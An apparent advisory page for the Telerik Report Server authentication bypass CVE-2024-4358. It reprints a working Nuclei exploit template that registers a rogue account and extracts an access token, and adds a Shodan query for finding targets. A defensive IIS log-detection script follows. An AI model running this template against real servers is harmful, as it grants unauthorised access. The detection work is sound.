CVE-2024-4358: Progress Telerik Report Server - Authentication Bypass

Date: 2025-08-01 | Affected software: Progress Telerik Report Server | PoC: public

Vulnerability description

In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.

PoC code [public]

id: CVE-2024-4358

info:
  name: Progress Telerik Report Server - Authentication Bypass
  author: DhiyaneshDK
  severity: critical
  description: |
    In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.
  impact: An unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.
  remediation: Updating to Report Server 2024 Q2 (10.1.24.514) or later.
  reference:
    - https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/
    - https://github.com/sinsinology/CVE-2024-4358
    - https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358
  classification:
    epss-score: 0.94374
    epss-percentile: 0.99963
    cpe: cpe:2.3:a:progress:telerik_report_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: title:"Log in | Telerik Report Server"
    product: telerik_report_server
    vendor: progress
  tags: cve,cve2024,telerik,progress,auth-bypass,intrusive,kev,vkev
variables:
  user: "{{rand_base(6)}}"
  pass: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"

http:
  - raw:
      - |
        POST /Startup/Register HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        Username={{user}}&Password={{pass}}&ConfirmPassword={{pass}}&Email={{email}}&FirstName={{firstname}}&LastName={{lastname}}

      - |
        POST /Token HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        grant_type=password&username={{user}}&password={{pass}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type_2, "application/json")'
          - 'contains_all(body_2, "access_token", "userName", "token_type")'
          - 'status_code_2 == 200'
        condition: and

    extractors:
      - type: regex
        name: token
        part: body_2
        group: 1
        regex:
          - '"access_token":"([A-Z0-9a-z_-]+)"'
        internal: true

      - type: dsl
        dsl:
          - '"Username: "+ user'
          - '"Password: "+ pass'
# digest: 4a0a00473045022050e135382c0bce2940d3c4e140a26d992eee7c18ad81f0e3bd1009da605c8060022100a178dcffa2c5e378155a3ab9443247707cd6b38dd5e6a45efa4a01bd990a4c6e:922c64590222798bb761d5b6d8e72950
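The template above reveals the request sequence a defender can look for: a POST to /Startup/Register (the first-run registration endpoint, which should not be reachable once the server is configured) followed shortly by a POST to /Token from the same client. The following script is an added example for this page, not code from the Nuclei project or from Progress; it parses IIS W3C extended log text and flags that pattern. The log lines, the trimmed field list and the ten-minute correlation window are constructed assumptions; real IIS logs carry more columns, and the parser reads whichever columns the `#Fields:` directive declares.

```python
"""Detect the CVE-2024-4358 request pattern in IIS W3C logs (added example).

A POST to /Startup/Register is only legitimate during first-time setup of
Telerik Report Server, so on an already configured server it is suspicious
on its own; a successful POST /Token from the same client shortly after
(a login with the newly created account) raises the confidence.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# Constructed sample log (not from a real server); RFC 5737 documentation IPs.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-06-01 10:00:01 GET /Login - 203.0.113.10 200
2024-06-01 10:00:05 POST /Startup/Register - 203.0.113.10 302
2024-06-01 10:00:07 POST /Token - 203.0.113.10 200
2024-06-01 10:05:00 GET /api/reportserver/reports - 198.51.100.7 401
2024-06-01 10:06:00 POST /Token - 198.51.100.7 400
"""

REGISTER_PATH = "/startup/register"          # endpoint the PoC posts to first
TOKEN_PATH = "/token"                        # endpoint it then logs in through
CORRELATION_WINDOW = timedelta(minutes=10)   # assumed value; tune per environment


@dataclass
class Finding:
    client_ip: str
    register_time: datetime
    token_time: Optional[datetime]   # time of a following successful /Token, if any
    confidence: str                  # "high" when a token login followed, else "medium"


def parse_w3c(text: str) -> List[Dict[str, str]]:
    """Parse W3C extended log text into rows keyed by the #Fields column names."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue  # other directives such as #Software or #Date
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed line: skip rather than misalign columns
        rows.append(dict(zip(fields, values)))
    return rows


def _timestamp(row: Dict[str, str]) -> datetime:
    return datetime.strptime(f"{row['date']} {row['time']}", "%Y-%m-%d %H:%M:%S")


def detect(rows: List[Dict[str, str]]) -> List[Finding]:
    """Flag POST /Startup/Register and correlate with a later POST /Token (rows in time order)."""
    findings: List[Finding] = []
    for i, row in enumerate(rows):
        if row["cs-method"].upper() != "POST" or row["cs-uri-stem"].lower() != REGISTER_PATH:
            continue
        reg_time = _timestamp(row)
        token_time = None
        for later in rows[i + 1:]:
            if later["c-ip"] != row["c-ip"]:
                continue
            t = _timestamp(later)
            if t - reg_time > CORRELATION_WINDOW:
                break
            if (later["cs-method"].upper() == "POST"
                    and later["cs-uri-stem"].lower() == TOKEN_PATH
                    and later["sc-status"] == "200"):
                token_time = t
                break
        findings.append(Finding(row["c-ip"], reg_time, token_time,
                                "high" if token_time else "medium"))
    return findings


if __name__ == "__main__":
    for f in detect(parse_w3c(SAMPLE_LOG)):
        print(f"{f.register_time} {f.client_ip}: POST /Startup/Register, "
              f"token login at {f.token_time}, confidence={f.confidence}")
```

Because a genuine first-time setup produces exactly the same two requests, treat a hit as suspicious only on servers that have already been configured; on a fresh install, baseline the one expected registration and alert on any later occurrence.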
